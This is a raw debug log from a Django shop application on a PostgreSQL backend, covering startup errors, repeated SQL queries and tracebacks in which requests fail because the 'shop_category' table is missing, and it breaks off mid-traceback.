Traceback (most recent call last): File "manage.py", line 17, in "Couldn't import Django. Are you sure it's installed and " ImportError: Couldn't import Django. Are you sure it's installed and available on your PYTHONPATH environment variable? Did you forget to activate a virtual environment? Traceback (most recent call last): File "manage.py", line 17, in "Couldn't import Django. Are you sure it's installed and " ImportError: Couldn't import Django. Are you sure it's installed and available on your PYTHONPATH environment variable? Did you forget to activate a virtual environment? python: can't open file 'myscript.py': [Errno 2] No such file or directory Traceback (most recent call last): File "manage.py", line 17, in "Couldn't import Django. Are you sure it's installed and " ImportError: Couldn't import Django. Are you sure it's installed and available on your PYTHONPATH environment variable? Did you forget to activate a virtual environment? Type 'manage.py help ' for help on a specific subcommand. Available subcommands: [auth] changepassword createsuperuser [authtoken] drf_create_token [contenttypes] remove_stale_contenttypes [django] check compilemessages createcachetable dbshell diffsettings dumpdata flush inspectdb loaddata makemessages makemigrations migrate sendtestemail shell showmigrations sqlflush sqlmigrate sqlsequencereset squashmigrations startapp startproject test testserver [rest_framework] generateschema [sessions] clearsessions [staticfiles] collectstatic findstatic runserver Watching for file changes with StatReloader DEBUG 2019-11-28 13:51:33,107 utils 18007 140499522098944 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-11-28 13:51:33,112 utils 18007 140499522098944 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() Watching for file changes with StatReloader DEBUG 2019-11-28 13:52:36,665 utils 18022 140356274423552 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-11-28 13:52:36,670 utils 18022 140356274423552 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-11-28 13:52:42,845 utils 18022 140356174259968 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T13:52:42.827517+00:00'::timestamptz AND "django_session"."session_key" = 'biw6we1oel7msww676czz6x96d1vikmi'); args=(datetime.datetime(2019, 11, 28, 13, 52, 42, 827517, tzinfo=), 'biw6we1oel7msww676czz6x96d1vikmi') DEBUG 2019-11-28 13:52:42,906 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 13:52:42,969 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 13:52:42,971 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,973 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,976 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,979 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,981 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,984 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,987 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,989 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,992 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,994 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,997 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:42,999 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:43,001 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:43,003 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:43,006 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:43,007 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:43,010 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:43,011 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:43,013 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:52:43,015 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 13:52:43] "GET / HTTP/1.0" 500 198460 DEBUG 2019-11-28 13:53:10,686 utils 18022 140356174259968 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T13:53:10.677342+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 13, 53, 10, 677342, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 13:53:10,692 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 13:53:10,763 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 13:53:10,765 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,766 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,767 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,769 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,770 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,771 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,772 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,774 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,775 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,776 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,778 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,780 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,781 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,783 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,785 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,786 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,787 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,789 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,790 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:10,791 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 13:53:10] "GET / HTTP/1.0" 500 198526 Not Found: /robots.txt [28/Nov/2019 13:53:11] "GET /robots.txt HTTP/1.0" 404 3799 DEBUG 2019-11-28 13:53:26,912 utils 18022 140356174259968 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T13:53:26.903802+00:00'::timestamptz AND "django_session"."session_key" = 'biw6we1oel7msww676czz6x96d1vikmi'); args=(datetime.datetime(2019, 11, 28, 13, 53, 26, 903802, tzinfo=), 'biw6we1oel7msww676czz6x96d1vikmi') DEBUG 2019-11-28 13:53:26,919 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 13:53:26,954 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 13:53:26,955 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,957 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,959 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,960 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,962 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,963 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,965 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,967 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,969 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,971 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,973 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,975 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,977 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,979 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,981 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,982 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,984 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,985 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,987 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:26,988 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File 